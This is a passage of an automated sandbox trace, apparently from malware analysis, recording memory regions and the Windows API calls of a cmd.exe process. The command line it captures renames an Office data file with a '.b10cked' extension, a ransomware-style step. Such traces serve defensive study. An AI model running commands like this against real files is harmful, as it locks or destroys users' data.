0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22865 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22876 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 22877 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22878 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22879 start_va = 0x290000 end_va = 0x296fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 22880 start_va = 0x2a0000 end_va = 0x2a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002a0000" filename = "" Region: id = 22881 start_va = 0x2b0000 end_va = 0x2b0fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 22882 start_va = 0x2c0000 end_va = 0x2c0fff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 22883 start_va = 0x3d0000 end_va = 0x4d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003d0000" filename = "" Region: id = 22884 start_va = 0x580000 end_va = 0x117ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 22885 start_va = 0x1180000 end_va = 0x12e2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001180000" filename = "" Thread: id = 351 os_tid = 0x7b8 [0168.468] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14f8a4 | out: lpSystemTimeAsFileTime=0x14f8a4*(dwLowDateTime=0x9b911bc0, dwHighDateTime=0x1d440a9)) [0168.468] GetCurrentProcessId () returned 0x308 [0168.468] GetCurrentThreadId () returned 0x7b8 [0168.468] GetTickCount () returned 0x31cc3 [0168.468] QueryPerformanceCounter (in: lpPerformanceCount=0x14f89c | out: lpPerformanceCount=0x14f89c*=22525760534) returned 1 [0168.469] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0168.469] __set_app_type (_Type=0x1) [0168.469] __p__fmode () returned 0x76b331f4 [0168.469] __p__commode () returned 0x76b331fc [0168.470] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0168.470] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0168.470] GetCurrentThreadId () returned 0x7b8 [0168.470] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x7b8) returned 0x38 [0168.470] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0168.470] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0168.470] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.490] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0168.490] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x14f834 | out: phkResult=0x14f834*=0x0) returned 0x2 [0168.490] VirtualQuery (in: lpAddress=0x14f86b, lpBuffer=0x14f804, dwLength=0x1c | out: lpBuffer=0x14f804*(BaseAddress=0x14f000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.490] VirtualQuery (in: lpAddress=0x50000, lpBuffer=0x14f804, dwLength=0x1c | out: lpBuffer=0x14f804*(BaseAddress=0x50000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0168.490] VirtualQuery (in: lpAddress=0x51000, lpBuffer=0x14f804, dwLength=0x1c | out: lpBuffer=0x14f804*(BaseAddress=0x51000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0168.490] VirtualQuery (in: lpAddress=0x53000, lpBuffer=0x14f804, dwLength=0x1c | out: lpBuffer=0x14f804*(BaseAddress=0x53000, AllocationBase=0x50000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.490] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x14f804, dwLength=0x1c | out: lpBuffer=0x14f804*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0168.490] GetConsoleOutputCP () returned 0x1b5 [0168.491] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.491] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0168.491] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.491] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0168.491] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.491] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0168.492] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.492] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0168.492] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.492] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0168.492] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.493] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0168.498] GetEnvironmentStringsW () returned 0x2e0210* [0168.498] FreeEnvironmentStringsW (penv=0x2e0210) returned 1 [0168.499] GetEnvironmentStringsW () returned 0x2e0210* [0168.499] FreeEnvironmentStringsW (penv=0x2e0210) returned 1 [0168.499] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e7a4 | out: phkResult=0x14e7a4*=0x40) returned 0x0 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x0, lpData=0x14e7b0*=0xa0, lpcbData=0x14e7a8*=0x1000) returned 0x2 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x4, lpData=0x14e7b0*=0x1, lpcbData=0x14e7a8*=0x4) returned 0x0 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x0, lpData=0x14e7b0*=0x1, lpcbData=0x14e7a8*=0x1000) returned 0x2 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x4, lpData=0x14e7b0*=0x0, lpcbData=0x14e7a8*=0x4) returned 0x0 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x4, lpData=0x14e7b0*=0x40, lpcbData=0x14e7a8*=0x4) returned 0x0 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x4, lpData=0x14e7b0*=0x40, lpcbData=0x14e7a8*=0x4) returned 0x0 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x0, lpData=0x14e7b0*=0x40, lpcbData=0x14e7a8*=0x1000) returned 0x2 [0168.499] RegCloseKey (hKey=0x40) returned 0x0 [0168.499] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x14e7a4 | out: phkResult=0x14e7a4*=0x40) returned 0x0 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x0, lpData=0x14e7b0*=0x40, lpcbData=0x14e7a8*=0x1000) returned 0x2 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x4, lpData=0x14e7b0*=0x1, lpcbData=0x14e7a8*=0x4) returned 0x0 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x0, lpData=0x14e7b0*=0x1, lpcbData=0x14e7a8*=0x1000) returned 0x2 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x4, lpData=0x14e7b0*=0x0, lpcbData=0x14e7a8*=0x4) returned 0x0 [0168.499] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x4, lpData=0x14e7b0*=0x9, lpcbData=0x14e7a8*=0x4) returned 0x0 [0168.500] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x4, lpData=0x14e7b0*=0x9, lpcbData=0x14e7a8*=0x4) returned 0x0 [0168.500] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x14e7ac, lpData=0x14e7b0, lpcbData=0x14e7a8*=0x1000 | out: lpType=0x14e7ac*=0x0, lpData=0x14e7b0*=0x9, lpcbData=0x14e7a8*=0x1000) returned 0x2 [0168.500] RegCloseKey (hKey=0x40) returned 0x0 [0168.500] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886386 [0168.500] srand (_Seed=0x5b886386) [0168.500] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll.b10cked\"" [0168.500] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll.b10cked\"" [0168.500] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.500] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2e1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0168.500] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0168.500] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0168.500] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.501] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0168.501] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0168.501] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0168.501] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0168.501] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0168.501] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0168.501] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0168.501] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0168.501] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0168.501] GetEnvironmentStringsW () returned 0x2e2360* [0168.501] FreeEnvironmentStringsW (penv=0x2e2360) returned 1 [0168.501] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.501] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.501] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0168.501] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0168.501] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0168.501] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0168.501] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0168.501] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0168.501] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0168.501] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0168.501] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x14f570 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.501] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x14f570, lpFilePart=0x14f56c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x14f56c*="Desktop") returned 0x18 [0168.501] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0168.501] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x14f2ec | out: lpFindFileData=0x14f2ec) returned 0x2e09f0 [0168.502] FindClose (in: hFindFile=0x2e09f0 | out: hFindFile=0x2e09f0) returned 1 [0168.502] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x14f2ec | out: lpFindFileData=0x14f2ec) returned 0x2e09f0 [0168.502] FindClose (in: hFindFile=0x2e09f0 | out: hFindFile=0x2e09f0) returned 1 [0168.502] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x14f2ec | out: lpFindFileData=0x14f2ec) returned 0x2e09f0 [0168.502] FindClose (in: hFindFile=0x2e09f0 | out: hFindFile=0x2e09f0) returned 1 [0168.502] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0168.502] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0168.502] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0168.502] GetEnvironmentStringsW () returned 0x2e0210* [0168.503] FreeEnvironmentStringsW (penv=0x2e0210) returned 1 [0168.503] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.503] GetConsoleOutputCP () returned 0x1b5 [0168.504] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.504] GetUserDefaultLCID () returned 0x409 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x14f6b0, cchData=128 | out: lpLCData="0") returned 2 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x14f6b0, cchData=128 | out: lpLCData="0") returned 2 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x14f6b0, cchData=128 | out: lpLCData="1") returned 2 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0168.506] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0168.506] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0168.507] GetConsoleTitleW (in: lpConsoleTitle=0x2d0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.513] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0168.513] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0168.513] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0168.515] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0168.516] _wcsicmp (_String1="move", _String2=")") returned 68 [0168.516] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0168.516] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0168.516] _wcsicmp (_String1="IF", _String2="move") returned -4 [0168.516] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0168.516] _wcsicmp (_String1="REM", _String2="move") returned 5 [0168.516] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0168.521] GetConsoleTitleW (in: lpConsoleTitle=0x14f3a8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.522] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0168.522] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0168.522] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0168.522] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0168.522] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0168.522] _wcsicmp (_String1="move", _String2="CD") returned 10 [0168.522] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0168.522] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0168.522] _wcsicmp (_String1="move", _String2="REN") returned -5 [0168.522] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0168.522] _wcsicmp (_String1="move", _String2="SET") returned -6 [0168.522] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0168.522] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0168.522] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0168.522] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0168.522] _wcsicmp (_String1="move", _String2="MD") returned 11 [0168.522] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0168.522] _wcsicmp (_String1="move", _String2="RD") returned -5 [0168.522] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0168.522] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0168.522] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0168.522] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0168.522] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0168.522] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0168.522] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0168.522] _wcsicmp (_String1="move", _String2="VER") returned -9 [0168.522] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0168.522] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0168.522] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0168.522] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0168.522] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0168.523] _wcsicmp (_String1="move", _String2="START") returned -6 [0168.523] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0168.523] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0168.523] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0168.525] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.525] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0168.525] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x14f164, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x14f15c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x14f15c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0168.525] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0168.525] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0168.525] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0168.525] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0168.525] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0168.526] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0168.527] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0168.527] _wcsicmp (_String1="MOR6IN~1.TRX", _String2=".") returned 63 [0168.527] _wcsicmp (_String1="MOR6IN~1.TRX", _String2="..") returned 63 [0168.527] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mor6in~1.trx")) returned 0x2020 [0168.527] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2e1f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.527] SetErrorMode (uMode=0x0) returned 0x0 [0168.528] SetErrorMode (uMode=0x1) returned 0x0 [0168.528] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX", nBufferLength=0x104, lpBuffer=0x14eaec, lpFilePart=0x14ead4 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX", lpFilePart=0x14ead4*="MOR6IN~1.TRX") returned 0x3c [0168.528] SetErrorMode (uMode=0x0) returned 0x1 [0168.528] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0168.528] _wcsicmp (_String1="MOR6IN~1.TRX", _String2=".") returned 63 [0168.528] _wcsicmp (_String1="MOR6IN~1.TRX", _String2="..") returned 63 [0168.528] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mor6in~1.trx")) returned 0x2020 [0168.528] SetErrorMode (uMode=0x0) returned 0x0 [0168.528] SetErrorMode (uMode=0x1) returned 0x0 [0168.528] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX", nBufferLength=0x104, lpBuffer=0x14ef68, lpFilePart=0x14ed00 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX", 